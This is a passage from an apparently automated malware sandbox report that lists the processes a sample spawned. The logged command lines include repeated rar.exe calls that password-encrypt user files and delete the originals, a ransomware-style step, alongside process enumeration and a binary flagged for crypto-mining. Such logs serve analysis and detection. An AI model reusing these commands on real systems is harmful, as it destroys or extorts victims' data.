                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:findstr encrypt.exe
                                                                                                          Imagebase:0x7ff60fad0000
                                                                                                          File size:34304 bytes
                                                                                                          MD5 hash:BCC8F29B929DABF5489C9BE6587FF66D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:46
                                                                                                          Start time:09:07:15
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:47
                                                                                                          Start time:09:07:15
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\daemon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Temp\daemon.exe"
                                                                                                          Imagebase:0xaa0000
                                                                                                          File size:1699840 bytes
                                                                                                          MD5 hash:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000002F.00000002.435462539.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth
                                                                                                          • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000002F.00000002.435462539.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth

                                                                                                          General

                                                                                                          Target ID:48
                                                                                                          Start time:09:07:21
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic process get executablepath
                                                                                                          Imagebase:0x7ff7110a0000
                                                                                                          File size:521728 bytes
                                                                                                          MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:49
                                                                                                          Start time:09:07:21
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:50
                                                                                                          Start time:09:07:24
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\daemon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\Temp\daemon.exe"
                                                                                                          Imagebase:0xaa0000
                                                                                                          File size:1699840 bytes
                                                                                                          MD5 hash:C44C67FBBD78AF44E4E75787E636E1FE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000032.00000002.453501314.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth
                                                                                                          • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000032.00000002.453501314.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Author: Florian Roth

                                                                                                          General

                                                                                                          Target ID:51
                                                                                                          Start time:09:07:27
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:findstr scan.exe
                                                                                                          Imagebase:0x7ff60fad0000
                                                                                                          File size:34304 bytes
                                                                                                          MD5 hash:BCC8F29B929DABF5489C9BE6587FF66D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:52
                                                                                                          Start time:09:07:28
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:53
                                                                                                          Start time:09:07:28
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:54
                                                                                                          Start time:09:07:28
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:55
                                                                                                          Start time:09:07:29
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\scan.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Temp\scan.exe
                                                                                                          Imagebase:0xf20000
                                                                                                          File size:4741120 bytes
                                                                                                          MD5 hash:A0B1030B402875ED5AE9338B73E6B5B2
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 32%, Metadefender, Browse
                                                                                                          • Detection: 23%, ReversingLabs

                                                                                                          General

                                                                                                          Target ID:56
                                                                                                          Start time:09:07:29
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, Metadefender, Browse
                                                                                                          • Detection: 0%, ReversingLabs

                                                                                                          General

                                                                                                          Target ID:57
                                                                                                          Start time:09:07:32
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:58
                                                                                                          Start time:09:07:33
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:59
                                                                                                          Start time:09:07:33
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:60
                                                                                                          Start time:09:07:33
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY=.rar1" "C:/Users/user/Desktop/IJIE2TCOJ5BFMU2CFZYG4ZY="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:61
                                                                                                          Start time:09:07:33
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff7e8070000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:62
                                                                                                          Start time:09:07:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:63
                                                                                                          Start time:09:07:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:wmic process get executablepath
                                                                                                          Imagebase:0x7ff7110a0000
                                                                                                          File size:521728 bytes
                                                                                                          MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:64
                                                                                                          Start time:09:07:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:65
                                                                                                          Start time:09:07:34
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/IRLFOSCLJVHEMTSOFZSG6Y3Y"
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:66
                                                                                                          Start time:09:07:35
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:67
                                                                                                          Start time:09:07:35
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:68
                                                                                                          Start time:09:07:35
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:69
                                                                                                          Start time:09:07:37
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JNNFORSOKJMFSS2JFZWXAMY="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:70
                                                                                                          Start time:09:07:37
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:71
                                                                                                          Start time:09:07:37
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:72
                                                                                                          Start time:09:07:39
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:73
                                                                                                          Start time:09:07:39
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:74
                                                                                                          Start time:09:07:39
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JRKEWTKZIJJUKWK2FZ4GY43Y"
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:75
                                                                                                          Start time:09:07:41
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:76
                                                                                                          Start time:09:07:41
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:77
                                                                                                          Start time:09:07:42
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/JZLVIVSDIRKU2T2CFZYGIZQ="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:78
                                                                                                          Start time:09:07:42
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/K5KVISSTINBEGRSYFZVHAZY="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:79
                                                                                                          Start time:09:07:43
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:80
                                                                                                          Start time:09:07:43
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y.rar1" "C:/Users/user/Desktop/IRLFOSCLJVHEMTSOFZSG6Y3Y"
                                                                                                          Imagebase:0x7ff6a6590000
                                                                                                          File size:273920 bytes
                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:81
                                                                                                          Start time:09:07:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\Temp\rar.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY=.rar1" "C:/Users/user/Desktop/DVWHKMNFNN/LFIFGSKBINEFSWCXFZYG4ZY="
                                                                                                          Imagebase:0x7ff650b10000
                                                                                                          File size:624280 bytes
                                                                                                          MD5 hash:FAC97E0E14C47740AB74C0C14C0F9CEC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:82
                                                                                                          Start time:09:07:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7bab80000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          General

                                                                                                          Target ID:83
                                                                                                          Start time:09:07:44
                                                                                                          Start date:13/08/2022
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY=.rar1" "C:/Users/user/Desktop/IZCU4SKWJBHUSS2OFZWXAMY="
                                                                                                          Imagebase:0x7ff6a6590000
